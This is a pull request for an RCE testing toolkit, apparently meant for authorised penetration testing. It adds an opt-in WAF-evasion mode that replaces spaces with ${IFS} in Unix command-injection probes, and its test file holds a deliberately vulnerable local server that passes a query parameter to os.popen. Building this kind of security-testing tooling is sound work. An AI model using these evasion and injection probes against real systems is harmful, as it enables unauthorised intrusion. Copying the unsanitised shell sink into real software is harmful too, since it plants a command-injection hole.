### PR TITLE
feat(detection): --evade low WAF posture for shell probes (phase 6)

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — RCE Testing Toolkit
 
-**Version 2.14.0** · MIT · Python 3.8+ · no third-party dependencies
+**Version 2.15.0** · MIT · Python 3.8+ · no third-party dependencies
 
 RCEKit is an offensive **RCE testing toolkit** for authorised penetration
 testing, red teaming, and security research. It covers the full loop, not just
@@ -103,6 +103,7 @@ nothing. Run `python rcekit.py --doctor` to check corpus integrity.
 | `--webroot <path>` | (file-based) server-side directory the target can write to and serve | None |
 | `--web-base-url <url>` | (file-based) base URL that serves `--webroot` | None |
 | `--time-base <seconds>` | (time-based) base delay `N`; the regression fires `0/N/2N` and requires the response time to track it | `2.0` |
+| `--evade {none,low}` | WAF posture for `--methods` shell probes; `low` applies a minimal `${IFS}`-for-spaces transform (not aggressive evasion) | `none` |
 | `--verify-active-risk` | Highest safety tier `--verify-url` may fire (`safe`/`intrusive`/`stateful`) | `safe` |
 | `--verify-allow-destructive` | Let verification fire destructive payloads (persistence/backdoors); skipped by default | Off |
 | `--verify-chain <profile.json>` | Deliver each payload through a multi-step, session-aware flow (login/CSRF → prerequisites → payload delivery → trigger) and confirm in-band or out-of-band | None |
@@ -416,6 +417,25 @@ alongside `--methods reflected`: if the results-based method confirms, you have 
 execution proof, and the linear timing response corroborates it. This keeps the
 two tiers honest — a blind timing candidate is never dressed up as proven
 execution.
+
+### WAF posture (`--evade`)
+
+By default the detection methods send **clean, canonical payloads** — fewer
+variants, clearer confirmation, and the lowest false-positive rate. This assumes
+authorised, WAF-free access (ask the org for a WAF-bypass path rather than
+fighting the filter). `--evade low` opts into a **single, low-touch** transform
+for the Unix shell probes — `${IFS}` in place of spaces — drawn from the existing
+shell-bypass vocabulary:
+
+```bash
+python rcekit.py --acknowledge-consent --environments unix \
+  --verify-url "https://target.example/lookup?host=FUZZ" --methods reflected --evade low
+```
+
+This is deliberately minimal, not aggressive or noisy evasion. It applies to the
+shell command probes (`reflected`, `time`); the file-write probe stays canonical
+because `${IFS}` around its `>` redirect would break it, and expression probes
+(`eval`) are unaffected.
 
 **Safe by default.** Verification fires only low-impact proofs (enumeration,
 file reads, code-execution and WAF-bypass signatures). Reverse shells,

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.14.0"
+__version__ = "2.15.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -2119,11 +2119,22 @@ class DetectionMethod:
         blurring into an adjacent digit run (e.g. an arithmetic result)."""
         return "RK" + "".join(rng.choice(string.ascii_uppercase) for _ in range(5))
 
-    def _wrap(self, record: "PayloadRecord", core: str, windows: bool = False) -> str:
+    def _wrap(self, record: "PayloadRecord", core: str, windows: bool = False,
+              evade: bool = True) -> str:
         """Break out of the running command with a separator, then escape the
         probe for the record's serialization context — reusing the same
-        context/escape machinery the generator uses for every other payload."""
-        return self._wrap_context(record, f"{' & ' if windows else '; '}{core}")
+        context/escape machinery the generator uses for every other payload.
+
+        With ``--evade low`` and ``evade=True``, apply a single low-touch WAF
+        transform to Unix command probes — substitute ``${IFS}`` for spaces —
+        drawn from the existing shell-bypass vocabulary. It is deliberately
+        minimal, not aggressive/noisy evasion. Callers whose command uses a
+        redirect (``>``) pass ``evade=False``: ``${IFS}`` around ``>`` yields an
+        ambiguous redirect, so those stay canonical."""
+        body = f"{' & ' if windows else '; '}{core}"
+        if evade and not windows and self.config.get("evade") == "low":
+            body = body.replace(" ", "${IFS}")
+        return self._wrap_context(record, body)
 
     def _wrap_context(self, record: "PayloadRecord", body: str) -> str:
         """Escape ``body`` for the record's serialization context and apply the
@@ -2228,7 +2239,9 @@ class FileBased(DetectionMethod):
             core = f"echo {token} > {write_path}"
             cleanup = f"rm -f {write_path}"
         followup = {"url": f"{base}/{name}", "cleanup": cleanup, "path": write_path}
-        return [Probe(payload=self._wrap(record, core, windows=windows),
+        # The write uses a `>` redirect, which ${IFS} would turn into an ambiguous
+        # redirect, so this probe stays canonical even under --evade low.
+        return [Probe(payload=self._wrap(record, core, windows=windows, evade=False),
                       expected=token, forbidden=None, followup=followup)]
 
     def confirm(self, obs: "Observation", probe: "Probe") -> Verdict:
@@ -2671,6 +2684,12 @@ def main():
     parser.add_argument("--time-base", type=float, default=2.0,
                         help="(time-based detection) base delay N in seconds; the regression fires "
                              "0/N/2N and requires the response time to track it (default: 2.0).")
+    parser.add_argument("--evade", choices=["none", "low"], default="none",
+                        help="WAF posture for --methods shell probes. 'none' (default) sends clean, "
+                             "canonical payloads: fewer variants, clearer confirmation, lowest false "
+                             "positives — assumes authorised, WAF-free access. 'low' applies a single "
+                             "low-touch transform (${IFS} for spaces on Unix); deliberately minimal, not "
+                             "aggressive evasion.")
     parser.add_argument("--methods", default=None,
                         help="Comma-separated RCE detection methods to run against --verify-url/-r instead of "
                              "the classic per-payload oracle. Available: reflected (results-based execution "
@@ -2969,7 +2988,7 @@ def main():
                       f"Available: {', '.join(sorted(DETECTION_METHODS))}.")
                 return
             detection_config = {"webroot": args.webroot, "web_base_url": args.web_base_url,
-                                "time_base": args.time_base}
+                                "time_base": args.time_base, "evade": args.evade}
             if "file" in method_names:
                 if not (args.webroot and args.web_base_url):
                     print("[!] --methods file writes a file to the target and fetches it back, so it "

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -2016,5 +2016,74 @@ class EvalExprTestCase(unittest.TestCase):
             server.server_close()
 
 
+class EvadeTestCase(unittest.TestCase):
+    """Phase 6 — `--evade low`. Default is clean canonical payloads; `low` applies
+    a single low-touch transform (${IFS} for spaces) to Unix shell command probes
+    only, and never to the file-write redirect (which ${IFS} would break)."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+        self.rec = make_record(environment="unix", context="raw")
+
+    def test_default_is_canonical_no_obfuscation(self):
+        import random as _random
+        probe = ReflectedMath(self.gen).build_probes(self.rec, _random.Random(1))[0]
+        self.assertNotIn("${IFS}", probe.payload)
+        self.assertIn(" ", probe.payload)
+
+    def test_evade_low_substitutes_ifs_for_reflected_and_time(self):
+        import random as _random
+        reflected = ReflectedMath(self.gen, {"evade": "low"}).build_probes(self.rec, _random.Random(1))[0]
+        self.assertIn("${IFS}", reflected.payload)
+        self.assertNotIn(" ", reflected.payload)
+        timing = ParametricTime(self.gen, {"evade": "low", "time_base": 2}).build_probes(
+            self.rec, _random.Random(1))[-1]
+        self.assertIn("${IFS}", timing.payload)
+        self.assertNotIn(" ", timing.payload)
+
+    def test_file_write_stays_canonical_under_evade(self):
+        import random as _random
+        config = {"evade": "low", "webroot": "/var/www", "web_base_url": "http://t"}
+        probe = FileBased(self.gen, config).build_probes(self.rec, _random.Random(1))[0]
+        # The `>` redirect must not be broken by ${IFS}.
+        self.assertNotIn("${IFS}", probe.payload)
+        self.assertIn(" > ", probe.payload)
+
+    def test_evade_low_still_confirms_against_shell_sink(self):
+        import http.server
+        import os
+        import socketserver
+        import threading
+        import urllib.parse as up
+
+        class Handler(http.server.BaseHTTPRequestHandler):
+            def log_message(self, *a):
+                pass
+
+            def do_GET(self):
+                cmd = up.parse_qs(up.urlparse(self.path).query).get("host", [""])[0]
+                out = os.popen("echo " + cmd + " 2>&1").read()
+                self.send_response(200)
+                self.end_headers()
+                try:
+                    self.wfile.write(out.encode(errors="replace"))
+                except BrokenPipeError:
+                    pass
+
+        server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Handler)
+        port = server.server_address[1]
+        threading.Thread(target=server.serve_forever, daemon=True).start()
+        try:
+            results = self.gen.run_detection(
+                [self.rec], url=f"http://127.0.0.1:{port}/vuln?host=FUZZ", methods=["reflected"],
+                config={"evade": "low"})
+            confirmed = [r for r in results if r["verdict"] == "confirmed"]
+            self.assertTrue(confirmed, "the ${IFS} variant must still execute and confirm")
+            self.assertIn("${IFS}", confirmed[0]["payload"])
+        finally:
+            server.shutdown()
+            server.server_close()
+
+
 if __name__ == "__main__":
     unittest.main()


### PR DESCRIPTION
## Summary

Phase 6 (final) of the detection redesign: an opt-in, low-touch WAF posture for the shell-based detection methods.

The default stays **clean and canonical** — fewer variants, the clearest confirmation, and the lowest false-positive rate, assuming authorised WAF-free access. `--evade low` applies a **single minimal transform** — `${IFS}` for spaces on Unix — drawn from the existing shell-bypass vocabulary. It is deliberately **not** aggressive or noisy evasion.

## What changed

- **`--evade {none,low}`** flag, threaded through the detection config.
- Transform applied in `DetectionMethod._wrap`, gated so it only touches Unix command probes (`reflected`, `time`).
- **File-write probe opts out** (`evade=False`): `${IFS}` around its `>` redirect yields an ambiguous redirect, so it stays canonical. Expression (`eval`) probes are unaffected.

## Testing

- Default stays canonical (no `${IFS}`); `--evade low` substitutes `${IFS}` for reflected and time; the file-write redirect stays canonical.
- End-to-end check that the `${IFS}` variant still executes and confirms against a shell sink.
- `python -m unittest discover -s tests` — 121 tests green, no third-party dependencies.

## Notes

- Version bumped to `2.15.0`; README updated (Options + a WAF-posture section).
- This completes the phased detection redesign: reflected, `-r` input, file, time, eval, and now `--evade low`.